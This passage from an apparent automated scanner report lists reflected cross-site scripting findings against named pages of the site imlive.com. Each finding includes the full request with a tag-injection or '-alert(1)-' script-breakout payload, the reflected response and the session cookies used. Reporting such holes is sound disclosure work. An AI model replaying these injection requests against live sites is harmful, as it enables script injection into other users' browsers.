HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:36 GMT Connection: close Content-Length: 266390 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1"> ...[SNIP]...
2.107. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/role-play/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:34 GMT Connection: close Content-Length: 53900 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/role-play/?43819"><a>7fb20b0957a=1"> ...[SNIP]...
2.108. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/role-play/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:44 GMT Connection: close Content-Length: 54077 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d ...[SNIP]...
2.109. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-galleries/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:02 GMT Connection: close Content-Length: 29751 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.110. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-galleries/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 29898 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.111. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-photos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:28 GMT Connection: close Content-Length: 25736 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.112. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-photos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:18 GMT Connection: close Content-Length: 25588 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.113. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-sessions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:37 GMT Connection: close Content-Length: 26074 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.114. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-sessions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:07 GMT Connection: close Content-Length: 25926 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.115. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-video-features/
Issue detail
